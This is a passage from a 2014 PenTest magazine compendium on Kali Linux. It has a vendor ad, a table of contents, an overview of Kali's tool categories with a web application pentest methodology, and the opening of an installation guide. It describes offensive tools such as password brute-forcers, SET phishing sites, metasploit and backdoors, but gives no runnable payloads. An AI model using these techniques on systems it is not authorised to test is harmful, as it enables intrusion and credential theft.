PenTest Extra 03 2014 Teaser1

December 21, 2016 | Author: claudiu | Category: N/A
Share Embed Donate


Short Description

pentest...

Description

Cyber Security Auditing Software

Improve your Firewall Auditing As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand. he network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail e.g. web service query tools. However this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve. www.titania.com

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customer’s specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own companies styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself, evaluate for free at titania.com

Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade. He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania’s products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems. www.titania.com

KALI LINUX THE ULTIMATE GUIDE Copyright © 2014 Hakin9 Media Sp. z o.o. SK

Table of Contents What is Kali? ����������������������������������������������������������������������������������������������������������������������������������8 Comparison Of Kali Linux And Prevous Backtrack Versions ������������������������������������������������������19 Top 5 Kali Linux Tools You Absolutely Must Use �����������������������������������������������������������������������34 Kali Linux �������������������������������������������������������������������������������������������������������������������������������������41 The Ultimate Installation Guide for Kali Linux ���������������������������������������������������������������������������55 The Password Attacks �������������������������������������������������������������������������������������������������������������������70 Pentesting Wireless with Kali Linux ���������������������������������������������������������������������������������������������81 Kali Linux on a Raspberry Pi ��������������������������������������������������������������������������������������������������������85 In Depth Review of the Kali Linux: A Hacker’s Bliss ������������������������������������������������������������������88 Kali Linux – The BackTrack Successor ����������������������������������������������������������������������������������������95 Kali Linux WiFi Testing ��������������������������������������������������������������������������������������������������������������105 Web Applications with Kali Linux ����������������������������������������������������������������������������������������������118 Penetration Testing with Linux ����������������������������������������������������������������������������������������������������134 Bypassing new generation Firewalls with Meterpreter and SSH Tunnels �����������������������������������142 The Top 10 Kali Linux Security Tools �����������������������������������������������������������������������������������������153 Interview with Demóstenes Zegarra Rodríguez ��������������������������������������������������������������������������176 Case Study: Analysis of Security and Penetration Tests for Wireless Networks with Kali Linux 179 Mapping Kali Usage to NIST800-115 �����������������������������������������������������������������������������������������182 Interview with Jeff Weekes ����������������������������������������������������������������������������������������������������������195 How to Install Kali Linux �����������������������������������������������������������������������������������������������������������199 How to Login as a User in Kali linux �����������������������������������������������������������������������������������������215 How to Add or Create a New User in Kali Linux ������������������������������������������������������������������������216 How to Change Host Name in Kali Linux �����������������������������������������������������������������������������������218 How to Create an Instant Chat Session with ncat Between Kali and BackTrack ������������������������222 How to Remove Users in Kali Linux �������������������������������������������������������������������������������������������224 How to Delete Users in Kali Linux ����������������������������������������������������������������������������������������������225 How to Extract a RAR File ����������������������������������������������������������������������������������������������������������226 How to Use Dnmap in Kali Linux �����������������������������������������������������������������������������������������������228 How to Find Files in Kali Linux �������������������������������������������������������������������������������������������������236 How to Use Detect_sniffer6 ���������������������������������������������������������������������������������������������������������238 How to Use DNSenum in Kali Linux ������������������������������������������������������������������������������������������241 How to Use Dnsdict6 and Get the IPv6/IPv4 Address of a Domain �������������������������������������������245 How to Use Dnsmap in Kali Linux ���������������������������������������������������������������������������������������������248 How to Use DNSRecon in Kali Linux �����������������������������������������������������������������������������������������253 How to Use DNSRevenum6 �������������������������������������������������������������������������������������������������������258 How to Use Dnstracer ������������������������������������������������������������������������������������������������������������������260

4

KALI LINUX THE ULTIMATE GUIDE How to use Dnswalk ��������������������������������������������������������������������������������������������������������������������265 How to Use Hping3 ���������������������������������������������������������������������������������������������������������������������270 How to Use Fcrackzip in Kali Linux �������������������������������������������������������������������������������������������272 How to Use Fierce �����������������������������������������������������������������������������������������������������������������������276 How to Use Fping ������������������������������������������������������������������������������������������������������������������������279 How to Use Arping in Kali Linux ������������������������������������������������������������������������������������������������282 How to Use Hash-identifier ���������������������������������������������������������������������������������������������������������284 How to Use Jigsaw ����������������������������������������������������������������������������������������������������������������������287 How to Use Joomscan ������������������������������������������������������������������������������������������������������������������291 How to Use Nbtscan ��������������������������������������������������������������������������������������������������������������������294 How to Use Ncat ��������������������������������������������������������������������������������������������������������������������������297 How to Use Dmitry in Kali Linux ����������������������������������������������������������������������������������������������302 How to Create Bootable Kali Linux USB ������������������������������������������������������������������������������������310 How to Gain Access to Windows XP/Linux by ncat ������������������������������������������������������������������321 How to Install DVWA on Kali Linux �����������������������������������������������������������������������������������������325 How to Install Flash Player in Kali Linux �����������������������������������������������������������������������������������332 How to Use Arachni_web in Kali Linux ��������������������������������������������������������������������������������������334

5

KALI LINUX THE ULTIMATE GUIDE

Dear PenTest Readers,

W

e are happy to bring to you the Ultimate Kali Compendium. This issue is a collection of our previous Kali Linux issues: Kali Linux, Kali Linux 2, and Kali Tutorial. Now, all the knowledge from these three magazines we have decided to put into one.

You will encounter simple articles like an overview of Kali, installation guide, and its comparison to previous BackTrack versions, as well as advanced ones, such as Wi-Fi testing or bypassing new generation firewalls with Meterpreter and SSH tunnels. Also, you will be able to read a few fascinating interviews with Dan Dieterle, Demóstenes Zegarra Rodriguez, and Jeff Weekes. You will also get to know about almost every tool available in the OS, their advantages and disadvantages, as well as how to use them and for what. We sincerely hope that this compendium will acheive its goal, which is if you have a problem in Kali, you can find the solution in one place - the Ultimate Kali Compendium. Enjoy the issue and improve your pentesting knowledge.

The PenTest Team

6

Editor in Chief: Ewa Duranc [email protected] Managing Editor: Milena Bobrowska [email protected] Editorial Advisory Board: Jeff Weaver, Rebecca Wynn, Betatesters & Proofreaders: Rodrigo Comegno, David Jardin, Varun Nair, Greg Rossel, John Webb, Laszlo Acs, Abhiraj, Gilles Lami, José Luis Herrera, Ivan Gutierrez Agramont, Phil Patrick, Dallas Moore, Marouan Bellioum John Webb, Alexander Groisman, Mbella Ekoume, Arnoud Tijssen, Abhishek Koserwal Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine. Senior Consultant/Publisher: Paweł Marciniak CEO: Ewa Dudzic [email protected]

[ GEEKED AT BIRTH ]

Production Director: Andrzej Kuca [email protected] Art Director: Ireneusz Pogroszewski [email protected] DTP: Ireneusz Pogroszewski Publisher: Hakin9 Media SK 02-676 Warsaw, Poland Postepu 17D Phone: 1 917 338 3631 www.pentestmag.com Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

You can talk the talk. Can you walk the walk?

[ IT’S IN YOUR DNA ] LEARN: Advancing Computer Science Artificial Life Programming Digital Media Digital Video Enterprise Software Development Game Art and Animation Game Design Game Programming Human-Computer Interaction Network Engineering Network Security Open Source Technologies Robotics and Embedded Systems Serious Game and Simulation Strategic Technology Development Technology Forensics Technology Product Design Technology Studies Virtual Modeling and Design Web and Social Media Technologies

www.uat.edu > 877.UAT.GEEK Please see www.uat.edu/fastfacts for the latest information about degree program performance, placement and costs.

KALI LINUX THE ULTIMATE GUIDE

What is Kali? by Albert López (newlog) It’s a fact that these last years the Backtrack distribution has been the most used by security professionals and enthusiasts. Its path started right in 2006 and for seven years it was improved while gaining its place in the security community. Therefore, nowadays it’s hard to find someone interested in computer security that has not listened about Backtrack. In March 2013 the Offensive Security people went one step forward and published the definitive Backtrack evolution. His name: Kali. Coming from a team called Offensive Security, even if they deny it, what an appropriate name is Kali! The Hindu goddess of time, change and destruction or perhaps because the Philippine martial art… Pretty offensive, isn’t it? Leaving aside its name, we can assure that Kali is a powerful tool that any security professional can use for free.

The Good and The Bad Trying to list the possible drawbacks of Kali is a hard task, so we will start enumerating several of its advantages. Talking about Kali advantages is talking about the changes between Backtrack and Kali. We will suppose that the reader already knows what Backtrack is and which their capabilities are. Briefly, for those who don’t know anything about Backtrack, Backtrack is a Linux distribution, based on Ubuntu, with plenty of security tools cleverly classified and ready to use. Then, why Backtrack had to evolve into Kali? These are some of the changes in Kali and, therefore, some of its advantages.

Kali is based on Debian This implies many advantages. The first of all is that the repositories are synchronized with the Debian repositories so you can easily obtain security patches and repository updates. Maintaining your pentesting system updated is a key feature. Another advantage is that every tool in Kali is compliant with the Debian packaging policy. This may seem trivial but eventually will assure more robustness and clarity to the overall system structure and tools, also giving you an easy way to obtain the tools source codes to review or modify them.

Architecture compatibility A key feature in Kali is its improved ARM compatibility. Since Kali appeared, many impressive builds have been created. What do you think about building Kali on a Raspberry Pi or on a Samsung Galaxy Note? Pretty amazing, don’t you think?

Advanced wireless support One of the focuses of Kali developers has been to support a broad number of wireless devices being them internal hardware or USB dongles. This effort goes in conjunction with the implementation of a patched custom kernel including all the new patches focused in the injection of data through network interfaces. A main requirement when a security professional has to perform a Wireless Assessment.

8

KALI LINUX THE ULTIMATE GUIDE

Fully customization Kali is very flexible when it comes to visual interface or system customization. As for visual interface, now the user has the capability to choose several desktops such as Gnome, KDE or XFCE, among others. Regarding system customization, now you are able to easily create ISO images fully customized thanks to the Debian live-build scripts.

Business aware All the Kali customizations and the Debian stuff mentioned earlier give the capability to companies to deploy Kali in multiple systems and to perform network Kali installs from local or remote repositories.

Easy upgrades among future versions This is a key feature for every system administrator who has to maintain Kali systems or, actually, for anyone using Kali. With Backtrack, for any new version of Backtrack one had to completely reinstall the system. Now, with Kali, thanks to the move to Debian kali offers an easy way to upgrade your system when new versions come out.

Great documentation Another important thing to remark is that with Kali you have a lot of online documentation in order to guide you in all your tasks. As you can see, Kali is not only a new version of Backtrack but a full new infrastructure. And with this effort, a lot of new and powerful features have come. Regarding the disadvantages, it’s embarrassing to say that the writer has not found any relevant drawback of using Kali with security assessment purposes. As to the system architecture, the migration to Debian has brought a lot of powerful features. This combined with all the provided tools and the purpose of Kali developers to maintain them and provide the last updates as soon as possible makes Kali the best choice for anyone searching for a security distribution.

Included Tools Kali puts more than 200 toolas at your disposal. If these tools were not well organized and classified, the usability of that prenetrating testing framework wouldn’t be quite good. But as with Backtrack, all the tools are consistently classified by its category. We will know explain what each category is and what the most representative tools are.

9

KALI LINUX THE ULTIMATE GUIDE

Figure 1. Classification of tools The first category is Information Gathering. This category groups those tools focused in obtaining information about the target. Inside this category there is a huge amount of tools, each one divided by the kind of recognition that they do. For example, there is OS Fingerprinting, Network Scanners, SSL Analysis, VoIP Analysis and many more. From all these tools, we can highlight the old known tool Nmap that is a really powerful network scanner. With Nmap, besides of being able to know which ports are open, filtered or closed, you are able to identify which services are behind them and also perform operating system recognition. Furthermore, with the new versions you have the possibility to program scripts that will be added through its Nmap Scripting Engine (NSE) functionality. As of today, in the official Nmap site you can find more than 400 scripts that give Nmap even more power than ever. Another tool worth mentioning is theHarvester. This tool uses many search engines such as google, googleprofiles, bing, linkedin or shodan to find information about, for example, a company. You can find email addresses, host names and much more information pertaining to that company. The next category is Vulnerability Analysis. This one is focused in discovering vulnerabilities, so here you have tools such as vulnerability scanners or fuzzers. In this category you can find sqlmap. This is a great tool that really can help you finding and exploit SQL injection vulnerabilities. With this tool, you specify the web application and the parameters you want to check and then it sends a huge battery of tests. This tool is amazing and eases the repetitive task of testing all the payloads for a great number of database engines. Another important tool is OpenVAS. OpenVAS is a complete framework focused in the discovery of vulnerabilities. It was born as a fork of Nessus when this became non-free source. In the Web Applications category you can find tools that identify web applications and their vulnerabilities. To this end you have at your disposal tools such as Burp Suite. One of the main and basic features of Burp is its capacity to intercept all the requests sent to web applications so you can modify and resend them. But Burp is not only an intercepting tool, it is one of the best tools to perform web application analyses being 10

KALI LINUX THE ULTIMATE GUIDE them automatic or manual. For example, with Burp you will be able to load many payloads from a file and modify the parameters sent to the web application with that payload. This can allow you to perform brute force attacks against authentication forms, load customized payload to find SQL injection or cross-site scripting attack vectors. Its UI is pretty intuitive so any user will become familiar with all the features. You also have tools such as XSSer that in a similar way to Sqlmap launches a bunch of payloads to find cross-site scripting vulnerabilities. Then you have the Password Attacks category. This category is quite self-explanatory. You can find tools that crack passwords offline or launch attacks to online services. Remarkable tools are John the Ripper, oclhashcat-plus, medusa and THC-Hydra. The first one is an old but well maintained password cracking tool. One of the main features of the second tool is that you can use the power of GPUs to perform attacks on passwords and, finally, with medusa and THC-Hydra you will be able to launch brute force attacks against online services. THC-Hydra made a clear statement of intents (http://www.thc.org/thchydra/network_password_cracker_comparison.html) comparing its features against other tools such as medusa. And in that comparison, THC-Hydra is clearly the winner. The next category is Wireless Attacks. In this section you can find tools to analyze and attack wireless protocols such as IEEE 802.11, RFID/NFC or Bluetooth. The quintessential tool to perform analyses of the IEEE 802.11 (WiFi) protocol is aircrack-ng. This tool is a complete framework that allows you to perform many attacks against the different authentication and authorization mechanisms of WiFi networks. In the Exploitation Tools category you can find different tools that are designed to attack different kinds of systems or attack systems in different ways. One of the best tools that we have nowadays in order to exploit the vulnerabilities present in a system is metasploit. Metasploit is a complete framework that has a huge number of exploits ready to be launched against the objective. It is, more or less, a click and shoot tool that gives you everything built so you don’t have to worry about the technicalities of the vulnerability being exploited. You also have another interesting tool, SET. The Social Engineering Tool is another framework that will help you to take control of systems but using social engineering to achieve your goal. For example, with this tool you will be able to easily build phishing web sites so you can deceive users and make them install malicious software such as PDF files with malware in them that will be also provided by SET. The Sniffing/Spoofing category is used to store those tools used to intercept network, web or VoIP traffic. One of the best sniffers out there is Wireshark. With wireshark you will be able to intercept network traffic and the same tool will, where possible, identify the protocol used and highlight the important data. You will also be able to apply advanced filters to the data being intercepted once it is intercepted or while it’s being intercepted. Another interesting tool is dsniff. This tool is a complete framework divided in many applications that will let you intercept and identify interesting data such as passwords and e-mails or sniff encrypted SSL data by exploiting weak configurations. The following category is Maintaining Access. This category unifies all those tools that will help you to maintain access to the target and get the critical information stored in it. For example you have many operating system and web backdoors as well as different tools to encapsulate the outgoing traffic in protocols that are not normally filtered. For example, you have another old known tool called netcat (ncat). Netcat is a really flexible tool that allows you to perform client-server communication. Netcat is a basic tool that depending on your imagination can become a tool you will use every day for the many different things such as rapidly retrieving HTTP banners, transferring files from one machine to another and many more things.

11

KALI LINUX THE ULTIMATE GUIDE

Figure 2. Netcat tool The Reverse Engineering section unifies all those tools with which you can debug or disassemble binaries. In order to debug binaries you have ollydbg or edb-debugger. The first tool is a quite powerful debugger but it has to be executed through wine, given that it’s only available for Microsoft Windows systems. For this reason you have edb-debugger that despite being quite new is still useful. Then you have a complete framework for reverse engineering, radare2 (r2). This is the Swiss army knife of every reverse engineer that works with a Unix system as a workstation. Radare2 is not an easy tool to use. It has a hard learning curve, but once you get it, it becomes a really powerful tool. The framework radare2 is formed by many small tools such as r2, rabin, rasm or rax. Each one allows you to perform many different things. For example, with radare2 you will be able to inspect shellcodes, reverse engineer binaries from different platforms such as pe, elf, match0 and dex or java classes, analyze disk images to perform forensic analyses, find gadgets to build your ROP (Return Oriented Programming) payload, debug binaries, find differences between binaries (bindiffing) or patch binaries. All this can be extended with its capability to process plugins that you can program in Python, Go, Perl, Javascript, etc. In the Stress Testing section you can find different tools to check the capacity of your network, web application, WLAN or VoIP service to handle huge amounts of traffic. For example, with these tools you will be able to simulate denial of service attacks. With the tools found in the Hardware Hacking category you will be able to program sketches for Arduino devices and you will also find different tools to develop for Android – with the Android SDK – and analyze Android applications with tools such as APKTool and dex2jar. In kali, the Forensic category is amazing. There you have plenty of tools focused in several forensic fields. For example, you can find tools to carry out network forensics, PDF forensics, RAM forensics and much more. One tool that is hitting hard these days is volatility. This tool is used to analyze data stored in RAM. You can give volatility an image of the RAM in a given point and volatility will extract for you a lot of interesting information. For example, you can extract all the running processes in the moment, opened sockets and network connections, LM/NTLM hashes and LSA secrets and a lot of other information. If you want to start playing with it, the volatility people provides (http://code.google.com/p/ volatility/wiki/PublicMemoryImages) you many prepared RAM images with interesting data you can extract. Finally, you have the last two categories, Reporting Tools and System Services. In the reporting tools section, as its name suggests, you can find tools to help you when reporting all the vulnerabilities you have found. For example, you have recordmydesktop, that it’s simply a tool to create videos from your activities in your computer. Another important tool is truecrypt. Even it’s not directly related with the documentation task, as a security professional you always have to be really careful with where you store the results of your work. Truecrypt gives you the possibility to securely store your pentesting results and save them encrypted so nobody but you can read them. In the system services category you have different services you can launch to web you with your tasks. For example, you can launch an Apache HTTP server or a MySQL server. 12

KALI LINUX THE ULTIMATE GUIDE As you have seen, Kali has everything a pentester might need. And thanks to its flexibility, if the tool of your need is not in your arsenal, you still can easily install it in your distribution.

Web application pentesting process A penetration test it’s usually divided in two kinds of tasks. Those tasks that are automatic and those that are manual. The manual tasks are the ones that add value to your reports as a pentester, and are guided by your experience and intuition. These manual tasks are the ones that will make of your report something amazing and beautiful or the conversely, something that seems factory created. If you don’t go hard with these manual tasks you will end up with a report that anyone could produce given that all your findings will be discovered by automatic tools and, therefore, any one clicking a button will be able to get the same results. Another important issue for a pentester is the time factor. When you are hired to perform a penetration test, your time will be limited and, normally, the final outcome of the analysis will be directly related with the time available to carry the analysis out. Thus, it is of great importance to be organized and have some kind of methodology. In this chapter we will explain many steps for carrying out a penetration test for a web application but we will suppose that you will work alone. If you were part of a team, the methodology explained here would not be enough. We will not take into account the way you would be communicating with the team in order to share your results so they could use them in their tasks. In this chapter we won’t cover in depth what kind of vulnerabilities you should search for. Instead we will explain a methodical way that will allow you to easily find them once you know what to look for. If you are carrying out a complete penetration test against, for example, the network of a company, we’ll suggest you to follow the OSSTMM (http://www.isecom.org/research/osstmm.html) (Open Source Security Testing Methodology Manual) methodology. This is an open source methodology so you don’t have to pay in order to get and follow it. This methodology, broadly speaking, is a guide about when and what elements should be tested during a penetration test. Talking about web application security, if you want something more specific that also allows you to know what kind of vulnerabilities you have to search and what these vulnerabilities are, we highly recommend you reading the “OWASP Testing Guide” (https://www.owasp.org/index.php/OWASP _Testing_Guide_v3_Table_of_Contents). From its website, OWASP (Open Web Application Security Project) is “an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted”. In order to accomplish their objectives, OWASP have developed many different methodologies to many different problems such as pentesting web applications, reviewing source code, etc. The OWASP Testing Guide is a great resource to know what kind of things you should look for when conducting a web application penetration test. They explain all kind of vulnerabilities you may find, what they are and how you can find them. Of course, the explanations are not in depth, but once read, you will have a good standpoint to go on and search more information about the vulnerabilities and how to exploit them. Ok, then. Now that the concepts that we will explain, are clear, let’s explain them. As we said, the manual tasks in a penetration test are the key to obtain a good outcome of your work, but given that we have a limited time, we will need to somewhat relay in some automatic tools that will work in the background while we manually check our target. So the first step is to prepare those tools that will perform automatic scans. Here you have many possibilities. Some of them will be in the Kali distribution and some will not. If you are a security professional, meaning that you have some monetary gain from your work, we would advise you to buy one or more than one automatic scanners. Here we list some tools that can have the work done for a reasonable price. It’s worth noting that the tools listed below are more focused in system vulnerabilities, but they can also detect web vulnerabilities. • Nessus Vulnerability Scanner • QualysGuard 13

KALI LINUX THE ULTIMATE GUIDE Nessus is a tool that you will have to install in your local machine. On the contrary, QualysGuard is a service in the cloud. In our experience, QualysGuard makes a pretty good job and, comparing it with Nessus, QualysGuard probably gives less false positives. Both tools can produce reports as XML files so you can easily integrate their results to your reports. What we strongly advise is that you install more than one automatic scanner so you can compare their results, and what is of critical importance… ¡You must always check the vulnerabilities reported by them! If you don’t have the resources or don’t really want to buy any tool, you can always use w3af or the new tool Arachni Web Scanner from your Kali distribution to perform web application scans. W3af is a great tool and it’s already a pretty mature project. Now that you have launched your automatic web scanners – hopefully from a different machine so we have plenty of memory/CPU resources-, we can start the manual part. The following steps are completely related to a web application penetration test. Nowadays, web applications are a critical component in the business model of enterprises. The fact that a lot of web applications are specifically developed from the scratch to fulfill the company needs and that web vulnerabilities are easier to exploit than system vulnerabilities makes that attackers focus their efforts in exploiting them. This means that as pentesters we should also focus our efforts in securing them. The first step we should take would be to launch Burp Suite. With Burp Suite you will configure a localhost proxy in your browser so all the requests go through Burp. Then you configure the scope in Burp settings so you only log those requests in which the destination address is your target. This way you will prevent a lot of trash requests from showing up.

Figure 3. Requests The next step would be to navigate through the entire target website while watching the request history page in Burp. This way once you find an interesting web page in your target, you will know which request and response has been sent and received and you will be able to highlight or even comment it in Burp. Let’s define what may be interesting. 14

KALI LINUX THE ULTIMATE GUIDE • Requests with GET parameters • Requests with POST parameters • Requests setting cookies (Set-Cookie header) • And everything your intuition tells you that might be important You will end up with something similar to the next image: Figure 3. At this point you will have visited the entire web site and will have an idea of where the critical sections are. The third step would be to analyze all (or the most important) requests that might be important. Now is when you experience comes into play. You will have to apply all your knowledge to identify all kind of vulnerabilities. For example, if you are in front a request that sends POST parameters, that parameters will probably be used in a database query, so you will have to try different things to check if a SQL injection vulnerability exists. If you are certain that those parameters hit a database or might be vulnerable to a cross-site scripting vulnerability, you might want to combine your personal skills with the aid that tools such as Sqlmap or XSSer can provide. This way you will have all the tedious work done by automatic tools and you will be able to carry out the genius work. You should proceed this way until you have checked all the important requests. The next step would be to identify software weaknesses. Nowadays, the use of CMS is something really very widespread, so tools that help you identify if a CMS is being used would help. You can use, for example, WPScan in case you think that the CMS used is WordPress. This tool will help you identify the version of WordPress used and if it has any plugins installed so you can check if the WordPress or the plugin versions in use are outdated and, consequently, have vulnerabilities published. Finally, you will try to find configuration weaknesses. Here you should look for things such as outdated server software in use, bad SSL configurations, etc. With Qualys SSLLabs you will be able to obtain a good colored graphic showing you the strengths and weaknesses of the target website SSL certificates as shown in the next image: Figure 4.

Figure 4. The strengths and weaknesses of the target website SSL certificates 15

KALI LINUX THE ULTIMATE GUIDE As you can see in the first image, the target website has an SSL certificate that does not have the correct domain associated with it. And in the second image you can see and overall score generated by SSLLabs that shows that the ciphers supported by the certificate in use are vulnerable to known waeknesses. Needless to say that the same tasks that SSLLabs carry out, can be programmed by you with your own scripts so you don’t have to depend on external services. On the other hand, one good approach to check server technologies is to check the HTTP headers. This can be done in different ways, for example, you could use Burp, but given that it is something really easy to check is as simple as sending a GET request with netcat as shown in the following image:

Figure 5. GET request As you can see, we can obtain some valuable information such that they are using Apache web server – although the Apache version is hidden – and thanks to the X-Powered-By header – that should have been removed – we can infer that they are using Parallels Plesk Planel. Then we can try to find published exploits for that software. If it was not clear enough, sending a (malformed – without the host directive -) request using HTTP1.1 protocol will generate an error that will give you information about the hosting service in use. Look at the following image:

Figure 6. An error generated From the response of the server, you can infer that the website is hosted (or has something to do with) by the pracait.com service. Once you have finished all the manual review of the web application, it will be the time to merge the results you have found with the results that the automatic scanners have found. Explain how a good looking report should be done would be a subject to cover in another full article, so for this time, we will leave this out of the scope. Following the all these steps you will be able to carry out a good penetration test. Of course, the results obtained will depend on your experience and the time you have to perform the task.

16

KALI LINUX THE ULTIMATE GUIDE Here we only have outlined some of the steps and methodical techniques that will help you to optimize your time and efforts.

Learning from hacking In the previous chapter we have mentioned many times that the resulting outcome of your work will depend, in part, on the experience and intuition you have. It’s hard to define where the line between experience and intuition is given that, in most cases, your supposed intuition really arises from past experiences. Therefore, the key to be a good pentester is his experience. It is a usual practice that when companies are hiring security professionals, they always require them to have some prior proven experience, but, of course, if you have not worked before in the security field you will not have that experience. It is an infinite loop. What is the solution? Wargames! Wargames are a kind of challenges made for you to learn and get fun at the same time. Of course, you only will get fun if you are geek enough! There are several kinds of wargames. You can divide them by their architecture but also by their subject. Regarding its architecture, you have wargames that are thought to be downloaded to your local machines so you can overcome them offline. Other wargames are thought to be played online, therefore there are communities that provide online machines in which the challenge will be stored so you can access them. You can even download some wargames that are provided to you as virtual machines so you have a complete laboratory with all the tools you will need. There are so many wargames that they might cover all the security field knowledge. You can find wargames to improve your system administration skills, about software exploitation, cryptography, protocol assessment and, of course, web application security. Given that this article has treated many web security concepts, we will talk about a wargame focused in web security. Again, the amazing people from OWASP, provides us with a wonderful project. His name: OWASP Broken Web Applications Project. With this wargame we will have to download a virtual machine that contains several vulnerable applications. These vulnerable applications are quite different between them. On one hand, we have the training applications that are designed in a way in which any user can learn what web vulnerabilities are in a friendly way. In this category you have applications such as Damn Vulnerable Web Application and OWASP WebGoat. On the other hand, we have applications that have been left vulnerable on purpose, but they are more realistic than the ones presented in the previous paragraph. From this category we highlight a Google project called Gruyere. Gruyere addresses a lot of concepts related with web security such as the different topologies of XSS, CRSF, XSSI, Ajax vulnerabilities and much other stuff. Finally, with the virtual machine comes a very interesting kind of vulnerable applications. They give us many real applications such as Wordpress or Joomla that are outdated, and given that its software is not updated they contain real vulnerabilities that have been found in the wild some time ago. So with this wargame you can go from 0 to an acceptable level thanks to the all-in-one wargame and its incremental difficulty approach. If you want to get a grasp of all the wargames out there, you can find a really good resource in this site: http://www.amanhardikar.com/mindmaps/Practice.html.

17

KALI LINUX THE ULTIMATE GUIDE

Farewell I’m glad you are still here! As you can deduce, we only have scratched the surface of the covered topics. No one will be outraged if you affirm that Kali distribution is the best security focused distro out there. Regarding the pentesting point, I hope you could grasp the idea behind it. It’s not an easy topic and it largely depends on your abilities, but being methodical is a big step to be successful. For this reason, we encourage you to train yourself with the mentioned wargames, because unlike other careers, in the information security field you have plenty of opportunities to learn relevant subject by yourself. Keep Hacking!

Bibliography Chapter 1 • • • •

http://en.wikipedia.org/wiki/BackTrack http://en.wikipedia.org/wiki/Kali_Linux http://en.wikipedia.org/wiki/Kali http://www.kali.org/about-us/

Chapter 2 • • • • •

http://www.kali.org/news/kali-linux-whats-new/ http://docs.kali.org/category/armel-armhf http://docs.kali.org/category/live-build http://docs.kali.org/network-install/kali-linux-network-pxe-install http://docs.kali.org/

Chapter 3

• http://nmap.org/nsedoc/index.html • https://www.volatilesystems.com/default/volatility

Chapter 4

• https://www.owasp.org/index.php/About_OWASP

Chapter 6

• https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

About the Author

Is a computer engineer that although finishing his degree the last year, has worked during two years developing system security software and making source code reviews in a company from Barcelona called Víntegris. Nowadays is gladly working for Internet Security Auditors as a security analyst where he has to perform security analyses to all kind of targets. However, his passion is exploiting software and everything related with low-level software development. For this reason, in 2009 he founded the Overflowed Minds community with the idea of spreading information of such an amazing subject.

18

KALI LINUX THE ULTIMATE GUIDE

The Ultimate Installation Guide for Kali Linux by Aamir Lakhani The Offensive Security team has released a new penetration testing Linux distribution named Kali Linux. BackTrack 5 RC3 was the last version of the BackTrack distributions. The project contributors have decided that to move forward with the challenges of cyber security and modern testing, a new platform was needed. Kali Linux was born and released March 13th 2013. Kali Linux is based on Debian and an FHS-Compliant file system. Kali has several advantages over the BackTrack distributions. Kali Linux comes with many more updated tools. Many of the outdated or redundant tools in BackTrack have been removed from Kali. The tools are streamlined with Debian repositories and synchronized four times a day. That means users have the latest software updates and security fixes and patches. The FHS-compliant file systems translate into running most tools from anywhere on the system. No need to go into pentest or other specific directory. Kali has also made customization, unattended installation, and flexible desktop environments strong feature in Kali Linux. Kali Linux is available for download at (http://www.kali.org/).

Kali System Setup Kali Linux can be downloaded in a few different ways from http://www.kali.org/downloads/. One of the most popular ways to get Kali Linux is to download the ISO image. The ISO image is available in 32-bit and 64-bit images and comes preloaded with the GNOME desktop environment. If you plan on using Kali Linux on a virtual machine such as Oracle’s Virtual Box or VMWare, there is a VM image prebuilt. The advantage of downloading the VM image is that it comes preloaded with open source VM tools. If you do plan on using it specifically on VMWare we will discuss how to update open source VM tools to VMWare Tools later in this article.

Running Kali Linux From External Media Kali Linux can be run without installing software on a host hard drive by accessing it from a media source such as memory card or DVD. This is a great method to test Kali Linux with minimum hassle. Although it is a great way to test Kali Linux, you will most likely not want to run it off external media for long periods of time, because it does have some negative performance impact on the system. Some applications require and expect Kali Linux to be installed and do not work well when used over external media sources. Furthermore, using a read-only storage media does not permit saving settings that may be required to make Kali Linux operate correctly. It’s highly recommended to install Kali Linux on a host hard drive or on a virtual machine.

Installing Kali Linux Installing Kali Linux on your computer is straightforward and similar to installing other operating systems. First, you’ll need compatible computer hardware. Kali is supported on i386, amd64, and ARM platforms. At the time of writing, Kali Linux can be installed on Galaxy Note 10.1, Raspberry Pi, Chromebooks, in addition to standard i386 and amd64 platforms. The hardware requirements are listed below, although I suggest exceeding the minimum amount by at least 3 times. The better hardware Kali Linux runs on, the better the performance and user experience will be. 19

